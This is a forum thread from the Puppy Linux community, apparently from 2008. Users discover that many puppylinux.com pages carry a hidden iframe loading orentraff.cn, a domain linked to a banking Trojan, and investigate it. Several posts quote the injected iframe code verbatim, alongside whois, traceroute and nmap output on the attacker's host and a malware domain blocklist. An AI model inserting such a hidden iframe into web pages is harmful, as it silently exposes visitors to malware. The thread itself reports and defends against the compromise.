Virus warning from www.puppylinux.com/manuals.htm

Puppy related raves and general interest that doesn't fit anywhere else
Post Reply
Message
Author
georgejc
Posts: 4
Joined: Thu 28 Feb 2008, 20:58
Location: Montreal, Quebec, Canada

Virus warning from www.puppylinux.com/manuals.htm

#1 Post by georgejc »

Hi,

I just sent a friend to try out Puppy, and he received several virus warnings from http://www.puppylinux.com/manuals.htm

Searching the forums, I noticed that you have had this problem in the past.

Also, just curious, why is this link http://orentraff.cn/in.cgi?7 in that page?

Caneri
Posts: 1513
Joined: Tue 04 Sep 2007, 13:23
Location: Canada

#2 Post by Caneri »

Yes something is not good here.

There is a redirect showing to China...please correct this...as it's a problem.

Eric
[color=darkred][i]Be not afraid to grow slowly, only be afraid of standing still.[/i]
Chinese Proverb[/color]

wingruntled

#3 Post by wingruntled »

BUMP!
Somebody really needs to fix this!!!

Code: Select all

<big>http://www.puppy-linux.info/</big></big><iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe></a> <br>

georgejc
Posts: 4
Joined: Thu 28 Feb 2008, 20:58
Location: Montreal, Quebec, Canada

More bad news

#4 Post by georgejc »

Hi,

I know I'm new here, but I just found another page with the
<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe>
hidden at this page: http://www.puppylinux.com/cd-puppy.htm

If the people that run this site need some help, please contact me, and maybe I can be of some help and I'll let you know what kind of sites I can work on.

I would HIGHLY recommend that EVERY page be checked!

wingruntled

#5 Post by wingruntled »

Gjc
The puppylinux domain belongs to Barry Kauler himself.
BTW: good eye! I was looking for stray address in the other pages myself.

georgejc
Posts: 4
Joined: Thu 28 Feb 2008, 20:58
Location: Montreal, Quebec, Canada

Owner of Domain

#6 Post by georgejc »

Don't know if this guy is the victim or the criminal, but here is the whois data for that Chinese site:

Whois orentraff.cn

Domain Name: orentraff.cn

The results below are provided by CNNIC (China Internet Network Information Center - www.cnnic.net.cn) (whois.cnnic.net.cn)

Domain Name: orentraff.cn
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: N/A
Registrant Name: NizovGrisha
Administrative Email: grishanizov@gmail.com
Sponsoring Registrar: 厦门å

wingruntled

#7 Post by wingruntled »

I tracked down This Trojan that is plugged into puppylinux by that admin email address and it's nothing to sneeze at.
The Trojan primarily targets bank accounts and depending on the plugins installed, it may be able to perform the following activities:

* Gather sensitive information about the computer and user configuration information.
* Update itself and install new modules.
* Steal sensitive information contained in forms posted over HTTP (see webmail example)
* Steal local certificate files (*.pfx)
* Hijack the browser navigation.

Note: The hijacking browser navigation functionality of the Trojan may be used to steal confidential bank credentials by redirecting users to phishing Web sites when they attempt to login on certain predetermined web banking sites.
http://www.bluetack.co.uk/forums/lofive ... 18052.html

User avatar
ttuuxxx
Posts: 11171
Joined: Sat 05 May 2007, 10:00
Location: Ontario Canada,Sydney Australia
Contact:

#8 Post by ttuuxxx »

I just tried it and on the bottom of the page it was trying to bring up that china website. I think the page should be deleted straight away and maybe the links and remade some place else. Just for security reasons.
ttuuxxx
http://audio.online-convert.com/ <-- excellent site
http://samples.mplayerhq.hu/A-codecs/ <-- Codec Test Files
http://html5games.com/ <-- excellent HTML5 games :)

User avatar
alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

#9 Post by alienjeff »

Code: Select all

<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none">
Found on:
http://www.puppylinux.com/news.htm
http://www.puppylinux.com/forums.htm
http://www.puppylinux.com/flash-puppy.htm
http://www.puppylinux.com/cd-puppy.htm
http://www.puppylinux.com/hard-puppy.htm
http://www.puppylinux.com/faq.htm
http://www.puppylinux.com/links.htm
http://www.puppylinux.com/zippy-puppy.htm
http://www.puppylinux.com/thin-puppy.htm
http://www.puppylinux.com/emulator-puppy.htm
http://www.puppylinux.com/manuals.htm

Ahem!

Makes one wonder what might be buried in the ISOs.

On a more humorous note, here's another gem uncovered whilst scanning Barry's HTML source:

Code: Select all

<meta name="GENERATOR" content="IBM WebSphere Studio Homepage Builder V6.0.0 for Windows">
Guess Bluefish, Amaya, Composer (or e3, Leafpad or Geany, for that matter) and their ilk aren't good enough for some folks.

EDIT/ADDITION: Of more peculiar interest, note that Barry was building some of those pages while running Windows OS. Irony, sweet irony ...
Last edited by alienjeff on Sun 02 Mar 2008, 15:34, edited 1 time in total.
[size=84][i]hangout:[/i] ##b0rked on irc.freenode.net
[i]diversion:[/i] [url]http://alienjeff.net[/url] - visit The Fringe
[i]quote:[/i] "The foundation of authority is based upon the consent of the people." - Thomas Hooker[/size]

georgejc
Posts: 4
Joined: Thu 28 Feb 2008, 20:58
Location: Montreal, Quebec, Canada

Stupid Question

#10 Post by georgejc »

This may be a stupid question, but does the person who is responsible for puppylinux.com actually read any of these forum postings, or does anyone here know how to contact him?

wingruntled

#11 Post by wingruntled »

aj
Some of those pages were clean last night. It looks like this one is a prolific breeder.

Gjc
person who is responsible for puppylinux.com actually read any of these forum postings,
Sometimes but it seems like he keeps his distants.

User avatar
alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

Re: Stupid Question

#12 Post by alienjeff »

georgejc wrote:This may be a stupid question...
"There are no stupid questions, but there are a LOT of inquisitive idiots." - Dr`Keovorkian, ChanOp #puppylinux
[size=84][i]hangout:[/i] ##b0rked on irc.freenode.net
[i]diversion:[/i] [url]http://alienjeff.net[/url] - visit The Fringe
[i]quote:[/i] "The foundation of authority is based upon the consent of the people." - Thomas Hooker[/size]

User avatar
Lobster
Official Crustacean
Posts: 15522
Joined: Wed 04 May 2005, 06:06
Location: Paradox Realm
Contact:

Re: Stupid Question

#13 Post by Lobster »

georgejc wrote:This may be a stupid question, but does the person who is responsible for puppylinux.com actually read any of these forum postings, or does anyone here know how to contact him?
I have already sent Barry Kauler a PM (private message) through this forum

:)
Last edited by Lobster on Sat 08 Mar 2008, 06:50, edited 1 time in total.
Puppy Raspup 8.2Final 8)
Puppy Links Page http://www.smokey01.com/bruceb/puppy.html :D

User avatar
prehistoric
Posts: 1744
Joined: Tue 23 Oct 2007, 17:34

manuals mirror

#14 Post by prehistoric »

The manuals are also mirrored at http://puppylover.netsons.org/dokupuppy/. I just did a very quick check for "orentraff" and didn't find that string. That doesn't rule out another redirect which my eyes aren't sharp enough to catch right away.

I doubt Grisha Nizov is Chinese. I've been looking for an interloper who speaks a language more likely to be associated with the name.

User avatar
alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

#15 Post by alienjeff »

http://www.siteadvisor.com/sites/orentraff.cn/summary/
http://www.dnsstuff.com/tools/ipall.ch? ... 21.133.106
IP address: 77.221.133.106
Reverse DNS: 77.221.133.106.addr.datapoint.ru.
Reverse DNS authenticity: [Could be forged: hostname 77.221.133.106.addr.datapoint.ru. does not exist]
ASN: 0
ASN Name: IANA-RSVD-0
IP range connectivity: 0
Registrar (per ASN): Unknown
Country (per IP registrar): RU [Russian Federation]
Country Currency: RUR [Russia Rubles]
Country IP Range: 77.221.128.0 to 77.221.159.255
Country fraud profile: High
City (per outside source): Unknown
Country (per outside source): RU [Russian Federation]
Private (internal) IP? No
IP address registrar: BOGUS
Known Proxy? No
Link for WHOIS: 77.221.133.106

http://www.globedomain.com/forums/viewt ... view=print

sh-3.00# traceroute 77.221.133.106
traceroute to 77.221.133.106 (77.221.133.106), 30 hops max, 40 byte packets
1 192.168.123.254 (192.168.123.254) 1.256 ms 4.221 ms 1.196 ms
2 10.30.0.1 (10.30.0.1) 7.899 ms 8.047 ms 8.248 ms
3 172.20.97.1 (172.20.97.1) 9.57 ms 19.111 ms 13.811 ms
4 172.20.98.65 (172.20.98.65) 11.093 ms 8.163 ms 8.19 ms
5 172.20.103.34 (172.20.103.34) 10.803 ms 9.344 ms 17.053 ms
6 so-9-1.car2.Boston1.Level3.net (4.79.2.41) 28.061 ms 16.341 ms 13.772 ms
7 ae-5-5.ebr1.NewYork1.Level3.net (4.69.132.250) 22.926 ms 29.744 ms 21.959 ms
8 ae-4.ebr2.London1.Level3.net (4.69.132.110) 104.017 ms 88.724 ms 96.972 ms
9 ae-2.ebr2.Amsterdam1.Level3.net (4.69.132.134) 107.602 ms 104.205 ms 108.036 ms
10 ae-1-100.ebr1.Amsterdam1.Level3.net (4.69.133.85) 109.212 ms 98.03 ms 104.995 ms
11 ae-2.ebr2.Dusseldorf1.Level3.net (4.69.133.90) 106.62 ms 107.116 ms 106.284 ms
12 ae-4-4.car1.Stockholm1.Level3.net (4.69.135.21) 127.446 ms 126.947 ms 129.787 ms
13 rt741-001.stk.retn.net (213.242.110.18) 126.603 ms 134.132 ms 128.836 ms
14 ae0-3.RT008-002.spb.retn.net (81.222.15.45) 139.494 ms 137.416 ms 138.096 ms
15 GW-InfoBox.retn.net (81.222.2.102) 138.268 ms 140.336 ms 145.495 ms
16 77.221.128.58.addr.datapoint.ru (77.221.128.58) 144.319 ms 139.417 ms 137.992 ms
17 * * *

sh-3.00# nmap 77.221.133.106

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2008-03-01 06:31 PUP
Interesting ports on 77.221.133.106.addr.datapoint.ru (77.221.133.106):
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp closed pop3
143/tcp closed imap
443/tcp closed https
465/tcp closed smtps
953/tcp closed rndc
993/tcp closed imaps
995/tcp closed pop3s

Nmap finished: 1 IP address (1 host up) scanned in 31.860 seconds
[size=84][i]hangout:[/i] ##b0rked on irc.freenode.net
[i]diversion:[/i] [url]http://alienjeff.net[/url] - visit The Fringe
[i]quote:[/i] "The foundation of authority is based upon the consent of the people." - Thomas Hooker[/size]

User avatar
alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

#16 Post by alienjeff »

From http://malwaredomains.com/?tag=fake-codecs

DNS Blocklist Update 12/29
Posted on December 29th, 2007 in New Domains, Storm Worm, fake codecs by dglosser

Added: storm worm domains, rogue antivirus, fake codecs

e-learningcenter.ru flashupdate.net
googl.name health-hack.com
home-xxx.com jkh-novgorod.ru
juhost.ru l0calh0st.jino-net.ru
natural-amber.com newyearwithlove.com
orentraff.cn qarchive.net
s0s1.net taktomi.ru
traffurl.ru trffc.org
vip-ddos.org x5x.ru
xll-g.com milk0soft.com
xmaturelife.com


updates are located at http://www.malwaredomains.com/updates
The full files are located at: http://www.malwaredomains.com/files

BOOT file is in MS DNS format
spywaredomains.zones file is in BIND Server format
domains.txt file is the complete list along with original reference
[size=84][i]hangout:[/i] ##b0rked on irc.freenode.net
[i]diversion:[/i] [url]http://alienjeff.net[/url] - visit The Fringe
[i]quote:[/i] "The foundation of authority is based upon the consent of the people." - Thomas Hooker[/size]

Caneri
Posts: 1513
Joined: Tue 04 Sep 2007, 13:23
Location: Canada

#17 Post by Caneri »

Hey thanks AJ,

I've been getting a huge spike in traffic out of .ru

It says it's from puppyrus but I will definitely look much closer at this.

Eric
[color=darkred][i]Be not afraid to grow slowly, only be afraid of standing still.[/i]
Chinese Proverb[/color]

wingruntled

#18 Post by wingruntled »

Where is Barry?
The manual page is still infected.

User avatar
alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

#19 Post by alienjeff »

wingruntled wrote:Where is Barry?
Where's the emoticon for "bites down on tongue?"
[size=84][i]hangout:[/i] ##b0rked on irc.freenode.net
[i]diversion:[/i] [url]http://alienjeff.net[/url] - visit The Fringe
[i]quote:[/i] "The foundation of authority is based upon the consent of the people." - Thomas Hooker[/size]

purple_ghost
Posts: 416
Joined: Thu 10 Nov 2005, 02:18

Question is:

#20 Post by purple_ghost »

For the ordinary users. Have we been left with a Trojan in Puppy Linux iitself? Did I download a working Trojan with the manual? Should I rebuild by pup_save file?
Google Search of Forum: http://wellminded.com/puppy/pupsearch.html

Post Reply